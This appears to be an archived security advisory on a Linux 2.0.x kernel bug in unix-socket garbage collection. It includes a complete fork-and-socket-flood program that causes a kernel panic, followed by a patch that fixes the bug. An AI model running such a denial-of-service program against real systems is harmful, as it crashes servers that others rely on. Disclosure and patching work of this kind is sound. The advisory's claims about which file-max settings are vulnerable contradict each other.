COMMAND
net/unix/garbage.c
SYSTEMS AFFECTED
Linux 2.0.x
PROBLEM
Floody posted the following about insufficient allocation in
net/unix/garbage.c. 2.0.x kernels do not allocate enough space
for the internal stack used for garbage collection on unix
domain sockets. (The allocation is sufficient for the standard
system configuration of 1024 fd's, so only a custom-tuned box is
vulnerable.) The garbage collection code defines a MAX_STACK depth
of 1000 for its internal use, tests for this limit, and panics
when it is hit. On systems which have NR_FILE (or
/proc/sys/kernel/file-max) set to a value larger than 1024 or so,
it is therefore relatively trivial to write a user-space program
which opens a large number of unix domain sockets and eventually
causes a kernel panic in the garbage collection routines.
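The fixed-depth check described above can be modelled in user space. The following is only a sketch: struct gc_stack, gc_push() and gc_fill() are hypothetical names that do not appear in garbage.c, and the point where the kernel would call panic() is replaced by a -1 return so the limit can be observed safely.

```c
#include <stddef.h>

#define MAX_STACK 1000  /* fixed depth, as defined in the 2.0.x garbage.c */

/* Hypothetical stand-in for the kernel's stack of unix_socket pointers. */
struct gc_stack {
    void *slots[MAX_STACK];
    int in_stack;           /* first free entry, same role as in garbage.c */
};

/* Returns 0 on success, or -1 at the point where the kernel would panic. */
int gc_push(struct gc_stack *s, void *x)
{
    if (s->in_stack == MAX_STACK)
        return -1;
    s->slots[s->in_stack++] = x;
    return 0;
}

/* Reset the stack, then push up to n dummy entries.
 * Returns how many entries were accepted before the limit was hit. */
int gc_fill(struct gc_stack *s, int n)
{
    int i;

    s->in_stack = 0;
    for (i = 0; i < n; i++)
        if (gc_push(s, (void *)s) != 0)
            break;
    return i;
}
```

Calling gc_fill() with more than 1000 entries stops at 1000, which is the condition that becomes reachable once the file limit is raised above the stack depth.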
The following illustrates how a user-space program might exploit
this bug, causing a kernel panic:
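#include <stdio.h>
#include <unistd.h>     /* fork(), sleep() */
#include <sys/types.h>
#include <sys/socket.h>

/* Open AF_UNIX sockets until socket() fails, pause, then retry. */
void bomb()
{
    while(1) {
        while(socket(AF_UNIX, SOCK_STREAM, 0) != -1) ;
        sleep(5);
    }
}

int main()
{
    int i;

    printf("forking 6 unix socket bomb processes.\n");
    fflush(stdout);
    /* Six children plus the parent all run bomb(). */
    for(i = 0; i < 6; i++)
        if(fork() == 0) bomb();
    bomb();
    return 0;
}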
The panic was verified under 2.0.32. This program
is able to cause a panic on a system which does NOT have
/proc/sys/kernel/file-max > 1024.
SOLUTION
The solution is slightly more complicated than simply increasing
MAX_STACK, because a single page is allocated for the stack and,
on the i386 architecture, a page can hold only 1024 entries.
2.0.33 should fix this; 2.1.x has already been fixed.
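The 1024-entry figure follows from the page and pointer sizes: assuming the usual i386 values of a 4096-byte page and 4-byte pointers, 4096 / 4 = 1024. A small sketch of that arithmetic, using hypothetical helper names that are not part of the kernel:

```c
#include <stddef.h>

/* Number of pointer-sized stack entries that fit in one page. */
size_t entries_per_page(size_t page_size, size_t ptr_size)
{
    return page_size / ptr_size;
}

/* Pages needed to hold `entries` pointers, rounded up. */
size_t pages_needed(size_t entries, size_t page_size, size_t ptr_size)
{
    size_t per_page = entries_per_page(page_size, ptr_size);

    return (entries + per_page - 1) / per_page;
}
```

With these values, pages_needed(1024, 4096, 4) is 1, while any larger file limit needs at least two pages, which is why a single-page allocation cannot simply be paired with a bigger MAX_STACK.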
For everyone else's benefit, here is a patch. This is only
necessary for 2.0.x kernels, when the maximum number of open
files has been increased beyond 1024 (which is becoming
increasingly common for heavily loaded production servers).
*** net/unix/garbage.c.orig Wed Dec 3 14:55:10 1997
--- net/unix/garbage.c Thu Dec 4 02:05:47 1997
***************
*** 5,10 ****
--- 5,20 ----
* Copyright (C) Barak A. Pearlmutter.
* Released under the GPL version 2 or later.
*
+ * 12/3/97 -- Flood
+ * Internal stack is only allocated one page. On systems with NR_FILE
+ * > 1024, this makes it quite easy for a user-space program to open
+ * a large number of AF_UNIX domain sockets, causing the garbage
+ * collection routines to run up against the wall (and panic).
+ * Changed the MAX_STACK to be associated to the system-wide open file
+ * maximum, and use vmalloc() instead of get_free_page() [as more than
+ * one page may be necessary]. As noted below, this should ideally be
+ * done with a linked list.
+ *
* Chopped about by Alan Cox 22/3/96 to make it fit the AF_UNIX socket problem.
* If it doesn't work blame me, it worked when Barak sent it.
*
***************
*** 59,68 ****
/* Internal data structures and random procedures: */
- #define MAX_STACK 1000 /* Maximum depth of tree (about 1 page) */
static unix_socket **stack; /* stack of objects to mark */
static int in_stack = 0; /* first free entry in stack */
!
extern inline unix_socket *unix_get_socket(struct file *filp)
{
--- 69,77 ----
/* Internal data structures and random procedures: */
static unix_socket **stack; /* stack of objects to mark */
static int in_stack = 0; /* first free entry in stack */
! static int max_stack; /* Calculated in unix_gc() */
extern inline unix_socket *unix_get_socket(struct file *filp)
{
***************
*** 110,116 ****
extern inline void push_stack(unix_socket *x)
{
! if (in_stack == MAX_STACK)
panic("can't push onto full stack");
stack[in_stack++] = x;
}
--- 119,125 ----
extern inline void push_stack(unix_socket *x)
{
! if (in_stack == max_stack)
panic("can't push onto full stack");
stack[in_stack++] = x;
}
***************
*** 151,158 ****
if(in_unix_gc)
return;
in_unix_gc=1;
!
! stack=(unix_socket **)get_free_page(GFP_KERNEL);
/*
* Assume everything is now unmarked
--- 160,173 ----
if(in_unix_gc)
return;
in_unix_gc=1;
!
! max_stack = max_files;
!
! stack=(unix_socket **)vmalloc(max_stack * sizeof(unix_socket **));
! if (!stack) {
! in_unix_gc=0;
! return;
! }
/*
* Assume everything is now unmarked
***************
*** 276,280 ****
in_unix_gc=0;
! free_page((long)stack);
}
--- 291,295 ----
in_unix_gc=0;
! vfree(stack);
}